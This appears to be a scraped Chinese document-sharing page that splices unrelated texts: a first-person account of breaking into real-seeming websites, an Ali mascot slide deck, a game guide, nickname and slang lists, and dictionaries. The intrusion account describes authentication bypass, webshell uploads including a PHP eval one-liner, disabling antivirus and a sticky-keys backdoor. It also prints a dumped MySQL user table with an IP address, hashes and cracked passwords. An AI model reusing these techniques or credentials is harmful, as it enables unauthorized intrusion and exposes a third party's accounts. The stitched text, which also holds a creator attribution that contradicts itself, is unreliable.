对啊狸官网一次蛋疼XX
对啊狸官网一次蛋疼XX规范

对啊狸官网的一次蛋疼XX0x00YY的念头昨晚大半夜在跟一妹纸聊天,还是刚认识不久的,样貌很行哦,突然冒出一个念头,额,本人很喜欢啊狸和悠嘻猴的公仔,想买对情侣的送给妹纸,然后呢,到找啊狸的官网上看,其实我也不知道怎么个,还有官网,突然呢,又想XXOO,X完后,看下能送一对来给我,太省钱了···只是YY。
0x01无从下手,我们先来踩踩,独立linux+lighttpd/1.4.26+php+mysql,主站为phpcms v9 ,论坛是dz7.2/7.0 ,简单看了下不存在弱口令之类的,漏洞也是没的,看whois信息。
于是我就想射射邮箱,可惜没弄下来,也没找到跟有关的信息,由于万网比较难社工客服,所以也没想搞劫持之类的。
0x02技巧技巧技巧于是乎看C段弄吧,一般我不会考虑搞C段的,因为很麻烦,搞不好就嗅探不了就浪费时间了。
在C段存活的主机也没太多,多数为独立域名,*nix的和win的数量差不多,所以我想从win的里搞。
/Webs/Default/Index.aspx看中一个,aspx+iis6+win03 的,也找到普遍的漏洞,开始连个后台也找不到,因为手上只有wwwscan 和菜刀,所以就扫啊扫,顺便手工也找下目录,字典比较烂,就找到了/manage/就没有了,利用搜索引擎也没找到这个网站的相关信息,OK,我们简单看下网站大概的结构。
这个事主页:/Webs/Default/Index.aspx这个事新闻页面:/Webs/News/News.aspx这个事主题页面:/Webs/MotifInfo/Motif.aspx这个事下载页面:/Webs/Download/Download.aspx这个事留言板块页面:/Webs/Contact/Message.aspx看出问题没有?!OK,我们刚才找到的是/manage/我大胆猜测是后台的第一个目录,我们来测试下,下一级目录/manage/Default出现403页面,也就是说目录存在,good,再猜下一级页面,如果不是文件就用工具扫,扫不到就继续猜猜看/manage/Default/login.aspx我的运气太好了。
ali阿狸演示ppt,介绍阿狸家族,分享阿狸漫画小故事

《一杯温馨的水》
• 在下午的咖啡馆, 桃子忽然想喝水 阿狸倒了一杯热水 给了她。 忽然觉得水太热, 怕桃子烫着, 阿狸便换了一杯凉 水给她。 又觉得水太凉。 于是,阿狸便倒了 一杯热水, 又把从冰箱取来的 一颗冰块放了进去。
《我相信》
我相信我是丑小鸭,就算没有天鹅的命运,我也生活的很开心 I Believe…
• 中文名:徐瀚 • 英文名:Hans • 生日:1982年8月6 日(狮子座) • 出生地:青岛 • 现居住地:北京 • 大学: 清华大学 美术学院 • 学历:清华大学美 术学院视觉传达专 业硕士学位
《鬼》
• 阿狸问隔壁的彼得叔叔 世界上有没有鬼? 彼得叔叔说:有时 候有,有时候没有。 于是阿狸问:为什 么是有时候有,有时候 没有? 彼得叔叔说: 比如走夜路的时候, 我们总期望没有鬼的。 如果有一天亲人不 在世了,我们却总是期 望有鬼的。 人生总是矛盾的。
它的名字叫……
阿 狸
我觉得,漫画,用想象 的方式告诉我们人生的道 理。 有人说漫画是幼稚的, 不得不说这个想法是片面 的是过时的。 漫画是将文字视觉化, 给人更深的印象和感悟, 就算是同一种漫画不同年 龄看有不同的体悟,我们 既可以得到启发同时也可 以在课余放松我们紧绷的 神经,何乐而不为呢。
大 熊
角色介绍
姓名:桃子 英文名:Peach
性别:女
生日:9月26日 星座:天秤座
性格特点:善良,优雅。
类型:狐狸 最喜欢的狐狸:阿狸 和阿狸的关系:阿狸的女 朋友
角色介绍
性别:影子 性别:男
生日:5月28日
星座:双子座 性格特点:活泼,乐观。
类型:狸猫
我相信人生是一幕没有彩排的舞台剧,需要用心演好角色,直到谢幕 I Believe…
阿狸玩家的操作方法

阿狸玩家的操作方法
阿狸是英雄联盟中的一个英雄角色,下面是阿狸玩家的一般操作方法:
1. 技能使用:
- Q技能“狐火": 阿狸放出一个火球,对命中的敌人造成伤害。
可以通过按下Q 键使阿狸释放技能。
- W技能“魅惑之狐": 阿狸放出三个火球围绕自己旋转,对附近的敌人造成伤害。
可以通过按下W键使阿狸释放技能。
- E技能“魅惑之箭": 阿狸发射一颗魅惑之箭,命中敌人后会施加魅惑效果并造成伤害。
可以通过按下E键使阿狸释放技能。
- R技能“灵动九尾": 阿狸瞬移到指定位置并释放一连串的火球攻击,对敌人造成大量伤害。
可以通过按下R键使阿狸释放技能。
2. 移动操作:
- 使用鼠标右键点击地图上的位置,阿狸会自动向该位置移动。
- 可以使用键盘上的WASD按键进行微调或取消移动命令。
3. 攻击操作:
- 使用鼠标左键点击敌人,阿狸会朝敌人进行普通攻击。
- 可以通过按下Q、W、E和R键实现技能攻击。
4. 阵地操作:
- 阿狸是一个法系脆皮输出型英雄,通常需要保持距离并利用技能进行打击。
- 可以通过释放R技能来突进敌人并造成大量伤害,然后迅速使用其他技能进行连击。
5. 基地操作:
- 阿狸可以在基地购买装备和补充生命值。
- 使用B键可以迅速回到基地。
这些操作方法只是一般性的介绍,实际游戏中还需要根据具体情况和游戏进程做相应的调整。
不同玩家也可能有不同的操作习惯和技术,所以你也可以根据自己的喜好和风格来使用阿狸的技能和战术策略。
拉风的网名

菲薄的青春
玩�ブ��
被自己的故事感动
删除过去■也是一种勇气
嘿〃乖乖到我碗里来
(��′)
刻骨铭心的是回忆
←№����~→☆
忘不了的爱人**/
傻吊不是你叫的
得到你�失去世界又怎样
我没你妈那么坚强
性感高贵冷艳的抠脚大汉
您真装i
老师我的作业在路上被抢了
�(��)�
�允������傲
I稀饭ㄚòひ
把回忆杀死了
独处一世的霸气
英语,滚回你老家去吧
女汉子都是自己摸胸
有多远就请你滚多远
比回忆自由
梦想天空分外蓝
喵了个Hello Kitty
人不可貌相小三不可�量
你忧伤地笑�
铿锵玫瑰
㈠个戏。子�
旧人不覆
八戒〃你又调皮ろ
爱疯不iPhone
淋暴雨打kiss
攻必是哀家呵,你配么也搜不到姐的温柔粉酱萌哒可爱柚逼^ ^@
林志颖再不老郭德纲就疯了
怕媳妇不是软弱那是爱@
老公看上了自己的闺蜜
笑°看狗咬狗
命硬
宁静的分手夜
你是我的信徒
嗯我是累赘@
谁不爱谁谁就是小三
超级拉风的QQ名字欣赏
迷失在前方的路
我顶你的肺
俄�冷血不需要理由
喊眠宝宝i
一如既的爱
爱着不爱我的人
可不可以不勇敢
成熟女人�代表
|�妖娆只是小三本性ヤ
依旧一生有你
庸人自扰
看着天空回想往事
泼出去的水我连盆都不要
烟鬼酒鬼大色鬼ぅ
疯人院毕业
小白兔�奶糖
哥拉风得拖网速
嘟幸福占线
加载中
分手吗再见吗草尼马怕你吗
情兽style
阿狸说过的经典语录

阿狸说过的经典语录阿狸,是一只来自巴黎创意绘本画家Tobias Debrunner创作的可爱卡通动物形象。
其形象逗趣,个性鲜明,成为了年轻人中十分流行的卡通形象,而其中也漫出了很多受欢迎的经典语录。
下文将举七个案例论证阿狸说过的经典语录。
1. “我配不上你。
”这是阿狸常常说的一句话,在人际交往方面,这句话输在了口头禅的直观度上,让人可以轻易理解,也很难忘记。
2. “生活不是一场竞赛,更不是一场比拼。
”这句话更多地是调侃显眼观众,传达了一种无所谓的态度,告诉我们生活不应被过多鞭打,我们要做好自己,开心就好了。
3. “Nothing is impossible.”这是阿狸的口头禅之一。
这句话传递的是一种无所不能的积极态度,告诫人们要有追求和憧憬,要创造和实现自己的梦想,永不言弃。
4. “Smiling is the best way to face every problem, to crush every fear and to hide every pain.”这句话很常被翻译成“微笑,是对付一切的最佳武器”,作为一种情感的宣泄和生活态度的表现,阿狸向我们展示了它的价值和真实。
它告诉我们“难过、生气、失落都是不的”,正如阿狸本人一样,不管面临什么,都要尽情微笑,充满自信地面对困难。
5. “Get lost, and find yourself.”这句话告诉我们,“走出去,重新找到你自己”,意思是在分心之前,让自己消失一段时间,为了重新焕发活力和想象力,学着重视自我。
6. “Don't lose yourself in the crowd.”“不要在繁忙的人群中迷失了自己”,这句话是告诫人类不能沉浸在嘈杂和纷扰之中,必须坚定自己的内心和定位,坚定地迈出脚步。
7. “Do what you love, love what you do.”“做你喜欢的事情,爱你所做的所有事情”,这句话是阿狸最富有启发性的口头禅之一。
QQ五笔用户词库_2014_11_8

ifog 污糟
ifpw 法穿
ifrv 潜热
ifuf 法兰
ifwf 梁朝伟
ifxk 法强
igiy 湿球温度
igrg 清兵
iguw 浮球阀
ihdd 波大
ihif 小法
ihiy 泪流
ihoq 小炮
ihrr 小白
ihtg 小垂
ihuf 小兰
iicq 湿水鸡
cbkd 预咗
cbqy 预留
ccrh 骚年
ccwu 双位
cesu 熊样
cfsg 圣杯
cftq 对称
cfwy 对住
cgat 马死落地行
ckwy 对唔住
cnwq 马爷
cqbx 鸡乸
cqdy 鸡碎
cqrq 骑猪的
cqrw 鸡扒
cwpb 难字
dakt 髧落嚟
dbal 冇阴功
gpjc 王祖贤
gqcq 死鸡
gqdw 死蠢
gqga 死开
gqiq 一镬泡
gqqu 死铲
gqsk 死歌
gqtl 残血
gqyb 一镬熟
grge 夹手夹脚
groo 一把火
grrj 一担担
gsyu 不要放弃治疗
gtip 不科学
gtjy 一身蚁
guih 事头婆
gukk 表冷器
jskr 果啲
jswg 晒命
jswh 果个
jtit 星海
jtwq 星爷
juge 暗敷
juuf 暗装
jxxs 最终幻想
kaca 咁劲
kage 咁靓
日语汉字假名对照

嶽
ガク、たけ
196 楽
樂
ガク、ラク、たの-しい、たの-しむ
197 額
ガク、ひたい
198 掛
か-ける、か-かる、かかり
199 潟
かた
200 括
カツ
201 活
カツ
202 喝
喝
99 屋
オク、や
100 億
オク
101 憶
オク
102 虞
おそれ
103 乙
オツ
104 卸
おろ-す、おろし
105 音
オン、イン、おと、ね
106 恩
オン
107 温
溫
オン、あたた-か、あたた-かい、あたた-まる、あたた-める
108 穏
穩
62 衛
衞
エイ
63 易
エキ、イ、やさ-しい
64 疫
エキ、ヤク
65 益
エキ、やく
66 液
エキ
67 駅
驛
エキ
68 悦
悅
エツ
69 越
エツ、こ-す、こ-える
70 謁
謁
エツ
71 閲
閱
オウ
91 往
オウ
92 押
オウ、お-す、お-さえる
93 欧
歐
オウ
94 殴
毆
オウ、なぐ-る
95 桜
櫻
オウ、さくら
96 翁
オウ
97 奥
奧
オウ、おく
98 横
橫
教你玩转网络用语

dd:弟弟jj:姐姐plmm:漂亮美眉xdjm:兄弟姐妹pfpf:佩服佩服pp:照片,但如果是说打pp,那就是kick your ass的意思了bt:变态。
和浮云的其他版块相比,水版是个bt出没的地方扁他(她、它)zt:转贴, 有时缩写成z,转的意思sl:色狼。
bl:玻璃,不是指一种易碎品,而是同性恋bc:白痴bd:笨蛋ry:人妖lm:流氓pg:屁股gf:girl friend,女友bf:boy friend,男友md:妈的,粗口,特别慎用!tmd:*** ,粗口,特别慎用!jjww:唧唧歪歪,指人说话的样子sjb:神经病pmp:拍马屁mpj:马屁精kick:扁kh:葵花,就是练葵花宝典的高手,浮云某高手已练至化境,人皆不呼其名,而直呼kh。
khbd:葵花宝典pxjf:辟邪剑法,源于khbd,kh专用的剑法js:奸商sp:support,支持的微:一种语气助词,kh专用呼呼,猪猪:睡觉稀饭:喜欢果酱:过奖bxcm:冰雪聪明lol:laugh out loud,大笑kfc:kxxx & fxxx & cxx,要是和某人有仇,就kfc他吧pk:player kill,砍人,攻击,也可解释为先批后kbtw:by the way,顺便说一句ps:两种意思,btw或者photoshop(一种电脑修图软件)cu:see you,再见bb:宝贝,情人,孩子,byebye,看具体使用走召弓虽:超强满清:满清十大酷刑,老祖宗的玩艺咔嚓:砍了酱紫:这样子饭饭:吃饭片片:同pp,照片斑竹,板猪:版主,论坛版块的管理人员,把水版比作个小店,他们就是店小二。
水桶,水鬼,水仙,水王,水怪,水母:指灌水狂人,水母特制女性水手:版中的芸芸众生潜水员:就是那些喜欢看别人灌水自己不灌水的家伙恐龙:长得难看的mm抓狂:受不了刺激而行为失常thx,3x:thanks,谢谢sigh:叹息cool:酷gay:同性恋,blfag:同性恋,blpm:论坛的私信zip it:闭嘴leecher:吸血鬼,指只知道索取不懂得分享回报的家伙,被严重鄙视的人dl:download,下载pub:网路上扫描到的ftp,可以临时起上传下载功能,也指把文件传到pubftp 上共享的行为。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
对啊狸官网的一次蛋疼XX0x00YY的念头昨晚大半夜在跟一妹纸聊天,还是刚认识不久的,样貌很行哦,突然冒出一个念头,额,本人很喜欢啊狸和悠嘻猴的公仔,想买对情侣的送给妹纸,然后呢,到找啊狸的官网上看,其实我也不知道怎么个,还有官网,突然呢,又想XXOO,X完后,看下能送一对来给我,太省钱了···只是YY。
0x01无从下手,我们先来踩踩,独立linux+lighttpd/1.4.26+php+mysql,主站为phpcms v9 ,论坛是dz7.2/7.0 ,简单看了下不存在弱口令之类的,漏洞也是没的,看whois信息。
于是我就想射射邮箱,可惜没弄下来,也没找到跟有关的信息,由于万网比较难社工客服,所以也没想搞劫持之类的。
0x02技巧技巧技巧于是乎看C段弄吧,一般我不会考虑搞C段的,因为很麻烦,搞不好就嗅探不了就浪费时间了。
在C段存活的主机也没太多,多数为独立域名,*nix的和win的数量差不多,所以我想从win的里搞。
看中一个,aspx+iis6+win03 的,也找到普遍的漏洞,开始连个后台也找不到,因为手上只有wwwscan 和菜刀,所以就扫啊扫,顺便手工也找下目录,字典比较烂,就找到了就没有了,利用搜索引擎也没找到这个网站的相关信息,OK,我们简单看下网站大概的结构。
这个事主页:这个事新闻页面:这个事主题页面:这个事下载页面:这个事留言板块页面:看出问题没有?!OK,我们刚才找到的是我大胆猜测是后台的第一个目录,我们来测试下,下一级目录出现403页面,也就是说目录存在,good,再猜下一级页面,如果不是文件就用工具扫,扫不到就继续猜猜看我的运气太好了。
我猜测目录都藏得不深不浅,应该不会存在什么万能密码,post注入,弱口令等等的吧,当然这是猜想,要测试后才知道,测试完毕后,我们先放在一边,看下能猜到编辑器路径没有,但是经过我一番乱猜,毛都没有。
突然我想到了一个问题,这个事大多数aspx系统程序都存在的问题,就是验证不严格。
嘿嘿,我前段时间不是公布了一个eizip3.0的后台文件验证不严格导致直接getwebshell的漏洞吗,虽然这个是我很久之前就发现的,但是我相信一定还有很多aspx系统程序也存在这个问题呢!OK,我们看下一步操作吧。
OK,我们来用老方法禁止js执行。
好了,设置完继续操作,禁止后就直接到后台了,:)我们看到添加,如果我们点击可能会有两个问题出现。
1、按下添加会没反应,由于禁止了js执行,所以导致按钮失效2、第二个就是成功咯。
我们再看。
直接添加管理,但是我测试了,在项目名称哪里可能由于禁止了js执行,所以导致无选项,最后导致添加不了管理,在这里我蛋碎一地。
后台页面也没有按钮可以给我点的了~~orz你们不会被难倒了吧?!这里可是第一个门槛啦,过了就开不了房子的门吗?答案是错的,记着我的话,我们一般禁止了js执行,看能导致页面框架变形,部分链接可能看不见,但这些链接是存在的,我们只是看不见表面而已,我们还有一个办法可以来进行找这些链接呢,你=想到什么办法吗?!Ok,我们来看怎么?!清楚怎么回事了吧!直接查看源码,剩下的链接就出来了,我们一个一个的测试,看下能找到利用的没,我找到了图片管理那里。
我们看下页面。
一个编辑器,但是我利用不了,因为禁止了js执行导致的,但是我们能上传,他有没有过滤我就不得而知了,我们直接测试下吧,看着名称是000,添加应该成功了,但是我找了一会也没找到路径,抓包也同样,当然也有可能没有添加成功,还有很多链接,我们一个一个测试吧。
于是我找到了一个能上传的页面仔细跟前面的看,是不同的,也就是说上传调用的页面也不同了。
这个事添加专家信息的页面,我在网站主页也找到了。
之后就上传了一匹asp一句话,在前台显示了这匹马,但是打开的时候是404,上传了几匹不同的马儿也是一样,开始我以为马儿不够壮,但是txt是能显示了,我猜是不是被墙了,或者是不支持asp呢,不支持asp应该不会吧,管理员没理由蛋疼到把asp解释也去除了,于是aspx能解释,放小马,上大马。
能执行cmd,内网,打了500+个补丁,简单看了下,mssql2005 ,su ,360 09年的版本。
由于测试网站很多,所以找了我一会才找到sa,因为对外部开放,所以放弃了,找到su,本来可以修改他的信息,当我使用exp的时候,随便挑个,发现拒绝访问,开始以为目录问题,换了N+1个也不行,怎么怎么怎么怎么怎么,aspx大马有个自带的看进程功能,发现360rp.exe,很简单嘛,直接K了,执行成功,上360神器,秒之,按5下shift,弹出cmd,然后你懂的,上服务器开CAIN,发现没有数据返回,这个蛋疼了,是不是装了个什么arp 墙了,好吧,我搞多一台服务器来开发包,因为手上这台太垃圾了,然后怕挂掉,之前我就是大半夜在一个游戏主站上双开,导致挂了,几个月了都连不进去,但是在另外一台内网中的服务器能ping通主站,这个我也不解,因为主站上用户数据库是放在mysql的另一台服务器上的,我看见root,所以想拿也拿不回了,mssql这台只是一个低级游戏数据库和,他的游戏npc,道具库,也没用。
所以现在我想到了再拿下一台一台用发包,一台用cain。
0x03难疼的弱口令经过多番XXOO,目标瞄准了一台linux的机子。
,貌似是一个叫闪聚手机聊天软件网站,Apache/2.2.14 Ubuntu10.04 php mysql>5.0 ,主站上我找到不到一个带参数的页面,于是乎扫下目录,找到admin,发现可遍历目录,好吧,弱口令进入后台,但是也没啥利用。
但是进过我仔细观察,发现一个重要的“秘密”。
当我把鼠标移到图片哪里,看见带参数了!于是我就YY了,Web Server: nginx/0.7.65Powered-by: PHP/5.3.2-1ubuntu4.9DB Server: MySQL >=5Resp. Time(avg): 961 msCurrent User: a dmin@124.205.62.21Sql Version: 5.5.18-logCurrent DB: shanjuSystem User: admin@124.205.62.21Host Name: shanju123Installation dir: /usr/local/mysqlDB User & Pass: root::localhostroot::shanju123root::127.0.0.1root::::localhost::shanju123admin:*F73CA1CE731C610A1F704255F94695CBF58FFA8A:%shajuslave_user:*31FCBBA27D3CCBE69D2A98C12893B80AA2B4719B:%shanju:*31FCBBA27D3CCBE69D2A98C12893B80AA2B4719B:%shanju:*31FCBBA27D3CCBE69D2A98C12893B80AA2B4719B:localhostshanju:*31FCBBA27D3CCBE69D2A98C12893B80AA2B4719B:127.0.0.1Data Bases: information_schemamysqlopenfireperformance_schema应该是反向代理了,所以对一般站点做踩点的时候应该多方位猜。
root密码没扫到,手工也是一个鸟样把hash解完后,我也省得手工去了,应为我发现不能外联的,能读,但是找不到路。
这里诱发一个问题,怎么我在域名后随便输入回显是APHCE,但是工具显示是NGINX,我们只要随便发个数据上去看。
大家可以看茄子牛的《关于安全宝产品的技术猜测》,你能发现其中奥秘,链接最后给出。
上面的hash解密后admin:adminshanju123shanjuslave_user:shanju123shanju:shanju123都是些弱口令,我就不太喜欢进行爆破的,什么3389,ssh,21,1433等的爆破和踩解,一般都是无路可走才去做的,所以~~~~蛋疼的事情发生了,连接ssh,输入root:toor/root/root123/shanju/adminshanju/adminshanju123/admin123/admin最后一个shanju123,我成功了!接下来就ls找到目录就写一句话。
Cd /var/www//www然后Echo test >1.php打开,显示test,成功。
再来Echo “<?php eval($_POST[f4ck])?>” >1.php文件显示存在,但是链接就是200,链接却不成功。
我就编辑下文件。
Vi 1.php发现确实是一句,直接保存退出,再用菜刀连接,成功了!我也不知道原因—0—```因为是聊天软件,所以应该有很多用户,根据图片判断应该有几十W帐户,谁知道连到库里一看只有8K+的用。
0x04失败的嗅探现在手上有两台机子了,一台发包,一台开嗅探,我选择使用linux来发包,win来嗅探,linux上我装上ettercap,win开CAIN,最后嗅探失败了,所以不写了。
第二天我上WIN上看数据的时候,发现WIN被植入木马了,还把我的密码改了,因为是弱口令原因,木马简单看了下。
创建服务,添加计划,每小时执行一次svchsot.exe,从而感染system32的原文件,然后修改注册表中的几个键值,可以看出哪个是扫鸡的。
《关于安全宝产品的技术猜测》/rayh4c/blog/item/38703d4e6c7629d6d0c86a64.html。